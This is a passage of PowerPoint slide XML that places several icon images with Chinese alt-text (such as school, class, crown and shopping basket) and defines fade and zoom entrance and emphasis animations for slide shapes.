          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
